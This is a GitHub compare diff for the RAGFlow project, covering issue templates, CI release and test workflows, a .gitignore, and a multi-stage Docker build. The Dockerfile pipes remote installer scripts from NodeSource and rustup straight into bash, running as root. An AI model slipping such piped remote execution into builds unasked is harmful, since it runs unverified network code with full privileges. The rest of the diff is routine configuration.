Fix: Share-log bugs (#9172 )

### What problem does this PR solve? Fix Share-log bugs #3221 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)
Refa: add result to callback for agent tool use. (#9137 )
2025-12-08 20:42:30 +08:00 · 2025-08-01 21:55:49 +08:00 · 2025-08-01 21:49:39 +08:00 · 2025-08-01 20:56:14 +08:00 · 2025-08-01 20:42:12 +08:00 · 2025-08-01 20:41:44 +08:00
1868 changed files with 272777 additions and 48384 deletions
--- a/.gitattributes
+++ b/.gitattributes
@ -1 +1,2 @@
-*.sh text eol=lf
+*.sh text eol=lf
 docker/entrypoint.sh text eol=lf executable
--- a/.github/ISSUE_TEMPLATE/bug_report.yml
+++ b/.github/ISSUE_TEMPLATE/bug_report.yml
@ -1,30 +1,36 @@
-name: Bug Report
+name: "🐞 Bug Report"
 description: Create a bug issue for RAGFlow
 title: "[Bug]: "
-labels: [bug]
+labels: ["🐞 bug"]
 body:
 - type: checkboxes
  attributes:
-    label: Is there an existing issue for the same bug?
+    label: Self Checks
-    description: Please check if an issue already exists for the bug you encountered.
+    description: "Please check the following in order to be responded in time :)"
    options:
-    - label: I have checked the existing issues.
+      - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
-      required: true
+        required: true
      - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
        required: true
      - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
        required: true
      - label: "Please do not modify this template :) and fill in all the required fields."
        required: true
 - type: markdown
  attributes:
    value: "Please provide the following information to help us understand the issue."
 - type: input
  attributes:
-    label: Branch name
+    label: RAGFlow workspace code commit ID
-    description: Enter the name of the branch where you encountered the issue.
+    description: Enter the commit ID associated with the issue.
-    placeholder: e.g., main
+    placeholder: e.g., 26d3480e
  validations:
    required: true
 - type: input
  attributes:
-    label: Commit ID
+    label: RAGFlow image version
-    description: Enter the commit ID associated with the issue.
+    description: Enter the image version(shown in RAGFlow UI, `System` page) associated with the issue.
-    placeholder: e.g., c3b2a1
+    placeholder: e.g., 26d3480e(v0.13.0~174)
  validations:
    required: true
 - type: textarea
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@ -1,10 +0,0 @@
 ---
 name: Feature request
 title: '[Feature Request]: '
 about: Suggest an idea for RAGFlow
 labels: ''
 ---
 **Summary**
 Description for this feature.
--- a/.github/ISSUE_TEMPLATE/feature_request.yml
+++ b/.github/ISSUE_TEMPLATE/feature_request.yml
@ -1,14 +1,20 @@
-name: Feature request
+name: "💞 Feature request"
 description: Propose a feature request for RAGFlow.
 title: "[Feature Request]: "
-labels: [feature request]
+labels: ["💞 feature"]
 body:
  - type: checkboxes
    attributes:
-      label: Is there an existing issue for the same feature request?
+      label: Self Checks
-      description: Please check if an issue already exists for the feature you request.
+      description: "Please check the following in order to be responded in time :)"
      options:
-        - label: I have checked the existing issues.
+        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
          required: true
        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
          required: true
        - label: "Please do not modify this template :) and fill in all the required fields."
          required: true
  - type: textarea
    attributes:
--- a/.github/ISSUE_TEMPLATE/question.yml
+++ b/.github/ISSUE_TEMPLATE/question.yml
@ -1,8 +1,21 @@
-name: Question
+name: "🙋‍♀️ Question"
 description: Ask questions on RAGFlow
 title: "[Question]: "
-labels: [question]
+labels: ["🙋‍♀️ question"]
 body:
 - type: checkboxes
  attributes:
    label: Self Checks
    description: "Please check the following in order to be responded in time :)"
    options:
      - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
        required: true
      - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
        required: true
      - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
        required: true
      - label: "Please do not modify this template :) and fill in all the required fields."
        required: true
 - type: markdown
  attributes:
    value: |
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@ -0,0 +1,118 @@
 name: release
 on:
  schedule:
    - cron: '0 13 * * *'  # This schedule runs every 13:00:00Z(21:00:00+08:00)
  # The "create tags" trigger is specifically focused on the creation of new tags, while the "push tags" trigger is activated when tags are pushed, including both new tag creations and updates to existing tags.
  create:
    tags:
      - "v*.*.*"                  # normal release
      - "nightly"                 # the only one mutable tag
 # https://docs.github.com/en/actions/using-jobs/using-concurrency
 concurrency:
  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
  cancel-in-progress: true
 jobs:
  release:
    runs-on: [ "self-hosted", "overseas" ]
    steps:
      - name: Ensure workspace ownership
        run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
      # https://github.com/actions/checkout/blob/v3/README.md
      - name: Check out code
        uses: actions/checkout@v4
        with:
          token: ${{ secrets.MY_GITHUB_TOKEN }}  # Use the secret as an environment variable
          fetch-depth: 0
          fetch-tags: true
      - name: Prepare release body
        run: |
          if [[ $GITHUB_EVENT_NAME == 'create' ]]; then
            RELEASE_TAG=${GITHUB_REF#refs/tags/}
            if [[ $RELEASE_TAG == 'nightly' ]]; then
              PRERELEASE=true
            else
              PRERELEASE=false
            fi
            echo "Workflow triggered by create tag: $RELEASE_TAG"
          else
            RELEASE_TAG=nightly
            PRERELEASE=true
            echo "Workflow triggered by schedule"
          fi
          echo "RELEASE_TAG=$RELEASE_TAG" >> $GITHUB_ENV
          echo "PRERELEASE=$PRERELEASE" >> $GITHUB_ENV
          RELEASE_DATETIME=$(date --rfc-3339=seconds)
          echo Release $RELEASE_TAG created from $GITHUB_SHA at $RELEASE_DATETIME > release_body.md
      - name: Move the existing mutable tag
        # https://github.com/softprops/action-gh-release/issues/171
        run: |
          git fetch --tags
          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
            # Determine if a given tag exists and matches a specific Git commit.
            # actions/checkout@v4 fetch-tags doesn't work when triggered by schedule
            if [ "$(git rev-parse -q --verify "refs/tags/$RELEASE_TAG")" = "$GITHUB_SHA" ]; then
              echo "mutable tag $RELEASE_TAG exists and matches $GITHUB_SHA"
            else
              git tag -f $RELEASE_TAG $GITHUB_SHA
              git push -f origin $RELEASE_TAG:refs/tags/$RELEASE_TAG
              echo "created/moved mutable tag $RELEASE_TAG to $GITHUB_SHA"
            fi
          fi
      - name: Create or overwrite a release
        # https://github.com/actions/upload-release-asset has been replaced by https://github.com/softprops/action-gh-release
        uses: softprops/action-gh-release@v2
        with:
          token: ${{ secrets.MY_GITHUB_TOKEN }}  # Use the secret as an environment variable
          prerelease: ${{ env.PRERELEASE }}
          tag_name: ${{ env.RELEASE_TAG }}
          # The body field does not support environment variable substitution directly.
          body_path: release_body.md
      # https://github.com/marketplace/actions/docker-login
      - name: Login to Docker Hub
        uses: docker/login-action@v3
        with:
          username: infiniflow
          password: ${{ secrets.DOCKERHUB_TOKEN }}
      # https://github.com/marketplace/actions/build-and-push-docker-images
      - name: Build and push full image
        uses: docker/build-push-action@v6
        with:
          context: .
          push: true
          tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}
          file: Dockerfile
          platforms: linux/amd64
      # https://github.com/marketplace/actions/build-and-push-docker-images
      - name: Build and push slim image
        uses: docker/build-push-action@v6
        with:
          context: .
          push: true
          tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}-slim
          file: Dockerfile
          build-args: LIGHTEN=1
          platforms: linux/amd64
      - name: Build ragflow-sdk
        if: startsWith(github.ref, 'refs/tags/v')
        run: |
          cd sdk/python && \
          uv build
      - name: Publish package distributions to PyPI
        if: startsWith(github.ref, 'refs/tags/v')
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          packages-dir: sdk/python/dist/
          password: ${{ secrets.PYPI_API_TOKEN }}
          verbose: true
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@ -0,0 +1,175 @@
 name: tests
 on:
  push:
    branches:
      - 'main'
      - '*.*.*'
    paths-ignore:
      - 'docs/**'
      - '*.md'
      - '*.mdx'
  pull_request:
    types: [ opened, synchronize, reopened, labeled ]
    paths-ignore:
      - 'docs/**'
      - '*.md'
      - '*.mdx'
  schedule:
    - cron: '0 16 * * *'  # This schedule runs every 16:00:00Z(00:00:00+08:00)
 # https://docs.github.com/en/actions/using-jobs/using-concurrency
 concurrency:
  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
  cancel-in-progress: true
 jobs:
  ragflow_tests:
    name: ragflow_tests
    # https://docs.github.com/en/actions/using-jobs/using-conditions-to-control-job-execution
    # https://github.com/orgs/community/discussions/26261
    if: ${{ github.event_name != 'pull_request' || contains(github.event.pull_request.labels.*.name, 'ci') }}
    runs-on: [ "self-hosted", "debug" ]
    steps:
      # https://github.com/hmarr/debug-action
      #- uses: hmarr/debug-action@v2
      - name: Show who triggered this workflow
        run: |
          echo "Workflow triggered by ${{ github.event_name }}"
      - name: Ensure workspace ownership
        run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
      # https://github.com/actions/checkout/issues/1781
      - name: Check out code
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
          fetch-tags: true
      # https://github.com/astral-sh/ruff-action
      - name: Static check with Ruff
        uses: astral-sh/ruff-action@v3
        with:
          version: ">=0.11.x"
          args: "check"
      - name: Build ragflow:nightly-slim
        run: |
          RUNNER_WORKSPACE_PREFIX=${RUNNER_WORKSPACE_PREFIX:-$HOME}
          sudo docker pull ubuntu:22.04
          sudo docker build --progress=plain --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
      - name: Build ragflow:nightly
        run: |
          sudo docker build --progress=plain --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
      - name: Start ragflow:nightly-slim
        run: |
          echo -e "\nRAGFLOW_IMAGE=infiniflow/ragflow:nightly-slim" >> docker/.env
          sudo docker compose -f docker/docker-compose.yml up -d
      - name: Stop ragflow:nightly-slim
        if: always()  # always run this step even if previous steps failed
        run: |
          sudo docker compose -f docker/docker-compose.yml down -v
      - name: Start ragflow:nightly
        run: |
          echo -e "\nRAGFLOW_IMAGE=infiniflow/ragflow:nightly" >> docker/.env
          sudo docker compose -f docker/docker-compose.yml up -d
      - name: Run sdk tests against Elasticsearch
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
            export HTTP_API_TEST_LEVEL=p3
          else
            export HTTP_API_TEST_LEVEL=p2
          fi
          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv pip install sdk/python && uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_sdk_api
      - name: Run frontend api tests against Elasticsearch
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          cd sdk/python && UV_LINK_MODE=copy uv sync --python 3.10 --group test --frozen && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
      - name: Run http api tests against Elasticsearch
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
            export HTTP_API_TEST_LEVEL=p3
          else
            export HTTP_API_TEST_LEVEL=p2
          fi
          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_http_api
      - name: Stop ragflow:nightly
        if: always()  # always run this step even if previous steps failed
        run: |
          sudo docker compose -f docker/docker-compose.yml down -v
      - name: Start ragflow:nightly
        run: |
          sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml up -d
      - name: Run sdk tests against Infinity
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
            export HTTP_API_TEST_LEVEL=p3
          else
            export HTTP_API_TEST_LEVEL=p2
          fi
          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv pip install sdk/python && DOC_ENGINE=infinity uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_sdk_api
      - name: Run frontend api tests against Infinity
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          cd sdk/python && UV_LINK_MODE=copy uv sync --python 3.10 --group test --frozen && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
      - name: Run http api tests against Infinity
        run: |
          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
          export HOST_ADDRESS=http://host.docker.internal:9380
          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
            echo "Waiting for service to be available..."
            sleep 5
          done
          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
            export HTTP_API_TEST_LEVEL=p3
          else
            export HTTP_API_TEST_LEVEL=p2
          fi
          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && DOC_ENGINE=infinity uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_http_api
      - name: Stop ragflow:nightly
        if: always()  # always run this step even if previous steps failed
        run: |
          sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v
--- a/.gitignore
+++ b/.gitignore
@ -27,3 +27,169 @@ Cargo.lock
 # Exclude the log folder
 docker/ragflow-logs/
 /flask_session
 /logs
 rag/res/deepdoc
 # Exclude sdk generated files
 sdk/python/ragflow.egg-info/
 sdk/python/build/
 sdk/python/dist/
 sdk/python/ragflow_sdk.egg-info/
 # Exclude dep files
 libssl*.deb
 tika-server*.jar*
 cl100k_base.tiktoken
 chrome*
 huggingface.co/
 nltk_data/
 # Exclude hash-like temporary files like 9b5ad71b2ce5302211f9c61530b329a4922fc6a4
 *[0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]*
 .lh/
 .venv
 docker/data
 #--------------------------------------------------#
 # The following was generated with gitignore.nvim: #
 #--------------------------------------------------#
 # Gitignore for the following technologies: Node
 # Logs
 logs
 *.log
 npm-debug.log*
 yarn-debug.log*
 yarn-error.log*
 lerna-debug.log*
 .pnpm-debug.log*
 # Diagnostic reports (https://nodejs.org/api/report.html)
 report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
 # Runtime data
 pids
 *.pid
 *.seed
 *.pid.lock
 # Directory for instrumented libs generated by jscoverage/JSCover
 lib-cov
 # Coverage directory used by tools like istanbul
 coverage
 *.lcov
 # nyc test coverage
 .nyc_output
 # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
 .grunt
 # Bower dependency directory (https://bower.io/)
 bower_components
 # node-waf configuration
 .lock-wscript
 # Compiled binary addons (https://nodejs.org/api/addons.html)
 build/Release
 # Dependency directories
 node_modules/
 jspm_packages/
 # Snowpack dependency directory (https://snowpack.dev/)
 web_modules/
 # TypeScript cache
 *.tsbuildinfo
 # Optional npm cache directory
 .npm
 # Optional eslint cache
 .eslintcache
 # Optional stylelint cache
 .stylelintcache
 # Microbundle cache
 .rpt2_cache/
 .rts2_cache_cjs/
 .rts2_cache_es/
 .rts2_cache_umd/
 # Optional REPL history
 .node_repl_history
 # Output of 'npm pack'
 *.tgz
 # Yarn Integrity file
 .yarn-integrity
 # dotenv environment variable files
 .env
 .env.development.local
 .env.test.local
 .env.production.local
 .env.local
 # parcel-bundler cache (https://parceljs.org/)
 .cache
 .parcel-cache
 # Next.js build output
 .next
 out
 # Nuxt.js build / generate output
 .nuxt
 dist
 # Gatsby files
 .cache/
 # Comment in the public line in if your project uses Gatsby and not Next.js
 # https://nextjs.org/blog/next-9-1#public-directory-support
 # public
 # vuepress build output
 .vuepress/dist
 # vuepress v2.x temp and cache directory
 .temp
 # Docusaurus cache and generated files
 .docusaurus
 # Serverless directories
 .serverless/
 # FuseBox cache
 .fusebox/
 # DynamoDB Local files
 .dynamodb/
 # TernJS port file
 .tern-port
 # Stores VSCode versions used for testing VSCode extensions
 .vscode-test
 # yarn v2
 .yarn/cache
 .yarn/unplugged
 .yarn/build-state.yml
 .yarn/install-state.gz
 .pnp.*
 # Serverless Webpack directories
 .webpack/
 # SvelteKit build / generate output
 .svelte-kit
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@ -0,0 +1,19 @@
 repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.6.0
    hooks:
      - id: check-yaml
      - id: check-json
      - id: end-of-file-fixer
      - id: trailing-whitespace
      - id: check-case-conflict
      - id: check-merge-conflict
      - id: mixed-line-ending
      - id: check-symlinks
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.11.6
    hooks:
      - id: ruff
        args: [ --fix ]
      - id: ruff-format
--- a/217
+++ b/217
@ -1,20 +1,213 @@
-FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
+# base stage
-USER  root
+FROM ubuntu:22.04 AS base
 USER root
 SHELL ["/bin/bash", "-c"]
 ARG NEED_MIRROR=0
 ARG LIGHTEN=0
 ENV LIGHTEN=${LIGHTEN}
 WORKDIR /ragflow
-ADD ./web ./web
+# Copy models downloaded via download_deps.py
-RUN cd ./web && npm i && npm run build
+RUN mkdir -p /ragflow/rag/res/deepdoc /root/.ragflow
 RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
    cp /huggingface.co/InfiniFlow/huqie/huqie.txt.trie /ragflow/rag/res/ && \
    tar --exclude='.*' -cf - \
        /huggingface.co/InfiniFlow/text_concat_xgb_v1.0 \
        /huggingface.co/InfiniFlow/deepdoc \
        | tar -xf - --strip-components=3 -C /ragflow/rag/res/deepdoc 
 RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
    if [ "$LIGHTEN" != "1" ]; then \
        (tar -cf - \
            /huggingface.co/BAAI/bge-large-zh-v1.5 \
            /huggingface.co/maidalun1020/bce-embedding-base_v1 \
            | tar -xf - --strip-components=2 -C /root/.ragflow) \
    fi
-ADD ./api ./api
+# https://github.com/chrismattmann/tika-python
-ADD ./conf ./conf
+# This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
-ADD ./deepdoc ./deepdoc
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
-ADD ./rag ./rag
+    cp -r /deps/nltk_data /root/ && \
    cp /deps/tika-server-standard-3.0.0.jar /deps/tika-server-standard-3.0.0.jar.md5 /ragflow/ && \
    cp /deps/cl100k_base.tiktoken /ragflow/9b5ad71b2ce5302211f9c61530b329a4922fc6a4
 ENV TIKA_SERVER_JAR="file:///ragflow/tika-server-standard-3.0.0.jar"
 ENV DEBIAN_FRONTEND=noninteractive
 # Setup apt
 # Python package and implicit dependencies:
 # opencv-python: libglib2.0-0 libglx-mesa0 libgl1
 # aspose-slides: pkg-config libicu-dev libgdiplus         libssl1.1_1.1.1f-1ubuntu2_amd64.deb
 # python-pptx:   default-jdk                              tika-server-standard-3.0.0.jar
 # selenium:      libatk-bridge2.0-0                       chrome-linux64-121-0-6167-85
 # Building C extensions: libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev
 RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
    if [ "$NEED_MIRROR" == "1" ]; then \
        sed -i 's|http://ports.ubuntu.com|http://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
        sed -i 's|http://archive.ubuntu.com|http://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
    fi; \
    rm -f /etc/apt/apt.conf.d/docker-clean && \
    echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache && \
    chmod 1777 /tmp && \
    apt update && \
    apt --no-install-recommends install -y ca-certificates && \
    apt update && \
    apt install -y libglib2.0-0 libglx-mesa0 libgl1 && \
    apt install -y pkg-config libicu-dev libgdiplus && \
    apt install -y default-jdk && \
    apt install -y libatk-bridge2.0-0 && \
    apt install -y libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev && \
    apt install -y libjemalloc-dev && \
    apt install -y python3-pip pipx nginx unzip curl wget git vim less && \
    apt install -y ghostscript
 RUN if [ "$NEED_MIRROR" == "1" ]; then \
        pip3 config set global.index-url https://mirrors.aliyun.com/pypi/simple && \
        pip3 config set global.trusted-host mirrors.aliyun.com; \
        mkdir -p /etc/uv && \
        echo "[[index]]" > /etc/uv/uv.toml && \
        echo 'url = "https://mirrors.aliyun.com/pypi/simple"' >> /etc/uv/uv.toml && \
        echo "default = true" >> /etc/uv/uv.toml; \
    fi; \
    pipx install uv
 ENV PYTHONDONTWRITEBYTECODE=1 DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1
 ENV PATH=/root/.local/bin:$PATH
 # nodejs 12.22 on Ubuntu 22.04 is too old
 RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
    curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
    apt purge -y nodejs npm cargo && \
    apt autoremove -y && \
    apt update && \
    apt install -y nodejs
 # A modern version of cargo is needed for the latest version of the Rust compiler.
 RUN apt update && apt install -y curl build-essential \
    && if [ "$NEED_MIRROR" == "1" ]; then \
         # Use TUNA mirrors for rustup/rust dist files
         export RUSTUP_DIST_SERVER="https://mirrors.tuna.tsinghua.edu.cn/rustup"; \
         export RUSTUP_UPDATE_ROOT="https://mirrors.tuna.tsinghua.edu.cn/rustup/rustup"; \
         echo "Using TUNA mirrors for Rustup."; \
       fi; \
    # Force curl to use HTTP/1.1
    curl --proto '=https' --tlsv1.2 --http1.1 -sSf https://sh.rustup.rs | bash -s -- -y --profile minimal \
    && echo 'export PATH="/root/.cargo/bin:${PATH}"' >> /root/.bashrc
 ENV PATH="/root/.cargo/bin:${PATH}"
 RUN cargo --version && rustc --version
 # Add msssql ODBC driver
 # macOS ARM64 environment, install msodbcsql18.
 # general x86_64 environment, install msodbcsql17.
 RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
    curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - && \
    curl https://packages.microsoft.com/config/ubuntu/22.04/prod.list > /etc/apt/sources.list.d/mssql-release.list && \
    apt update && \
    arch="$(uname -m)"; \
    if [ "$arch" = "arm64" ] || [ "$arch" = "aarch64" ]; then \
        # ARM64 (macOS/Apple Silicon or Linux aarch64)
        ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql18; \
    else \
        # x86_64 or others
        ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql17; \
    fi || \
    { echo "Failed to install ODBC driver"; exit 1; }
 # Add dependencies of selenium
 RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chrome-linux64-121-0-6167-85,target=/chrome-linux64.zip \
    unzip /chrome-linux64.zip && \
    mv chrome-linux64 /opt/chrome && \
    ln -s /opt/chrome/chrome /usr/local/bin/
 RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chromedriver-linux64-121-0-6167-85,target=/chromedriver-linux64.zip \
    unzip -j /chromedriver-linux64.zip chromedriver-linux64/chromedriver && \
    mv chromedriver /usr/local/bin/ && \
    rm -f /usr/bin/google-chrome
 # https://forum.aspose.com/t/aspose-slides-for-net-no-usable-version-of-libssl-found-with-linux-server/271344/13
 # aspose-slides on linux/arm64 is unavailable
 RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
    if [ "$(uname -m)" = "x86_64" ]; then \
        dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_amd64.deb; \
    elif [ "$(uname -m)" = "aarch64" ]; then \
        dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_arm64.deb; \
    fi
 # builder stage
 FROM base AS builder
 USER root
 WORKDIR /ragflow
 # install dependencies from uv.lock file
 COPY pyproject.toml uv.lock ./
 # https://github.com/astral-sh/uv/issues/10462
 # uv records index url into uv.lock but doesn't failover among multiple indexes
 RUN --mount=type=cache,id=ragflow_uv,target=/root/.cache/uv,sharing=locked \
    if [ "$NEED_MIRROR" == "1" ]; then \
        sed -i 's|pypi.org|mirrors.aliyun.com/pypi|g' uv.lock; \
    else \
        sed -i 's|mirrors.aliyun.com/pypi|pypi.org|g' uv.lock; \
    fi; \
    if [ "$LIGHTEN" == "1" ]; then \
        uv sync --python 3.10 --frozen; \
    else \
        uv sync --python 3.10 --frozen --all-extras; \
    fi
 COPY web web
 COPY docs docs
 RUN --mount=type=cache,id=ragflow_npm,target=/root/.npm,sharing=locked \
    cd web && npm install && npm run build
 COPY .git /ragflow/.git
 RUN version_info=$(git describe --tags --match=v* --first-parent --always); \
    if [ "$LIGHTEN" == "1" ]; then \
        version_info="$version_info slim"; \
    else \
        version_info="$version_info full"; \
    fi; \
    echo "RAGFlow version: $version_info"; \
    echo $version_info > /ragflow/VERSION
 # production stage
 FROM base AS production
 USER root
 WORKDIR /ragflow
 # Copy Python environment and packages
 ENV VIRTUAL_ENV=/ragflow/.venv
 COPY --from=builder ${VIRTUAL_ENV} ${VIRTUAL_ENV}
 ENV PATH="${VIRTUAL_ENV}/bin:${PATH}"
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
-ADD docker/entrypoint.sh ./entrypoint.sh
+COPY web web
-RUN chmod +x ./entrypoint.sh
+COPY api api
 COPY conf conf
 COPY deepdoc deepdoc
 COPY rag rag
 COPY agent agent
 COPY graphrag graphrag
 COPY agentic_reasoning agentic_reasoning
 COPY pyproject.toml uv.lock ./
 COPY mcp mcp
 COPY plugin plugin
-ENTRYPOINT ["./entrypoint.sh"]
+COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
 COPY docker/entrypoint.sh ./
 RUN chmod +x ./entrypoint*.sh
 # Copy compiled web pages
 COPY --from=builder /ragflow/web/dist /ragflow/web/dist
 COPY --from=builder /ragflow/VERSION /ragflow/VERSION
 ENTRYPOINT ["./entrypoint.sh"]
--- a/Dockerfile.cuda
+++ b/Dockerfile.cuda
@ -1,25 +0,0 @@
 FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
 USER  root
 WORKDIR /ragflow
 ## for cuda > 12.0
 RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
 RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
 ADD ./web ./web
 RUN cd ./web && npm i && npm run build
 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 ENTRYPOINT ["./entrypoint.sh"]
--- a/Dockerfile.deps
+++ b/Dockerfile.deps
@ -0,0 +1,10 @@
 # This builds an image that contains the resources needed by Dockerfile
 #
 FROM scratch
 # Copy resources downloaded via download_deps.py
 COPY chromedriver-linux64-121-0-6167-85 chrome-linux64-121-0-6167-85 cl100k_base.tiktoken libssl1.1_1.1.1f-1ubuntu2_amd64.deb libssl1.1_1.1.1f-1ubuntu2_arm64.deb tika-server-standard-3.0.0.jar tika-server-standard-3.0.0.jar.md5 libssl*.deb /
 COPY nltk_data /nltk_data
 COPY huggingface.co /huggingface.co
--- a/Dockerfile.scratch
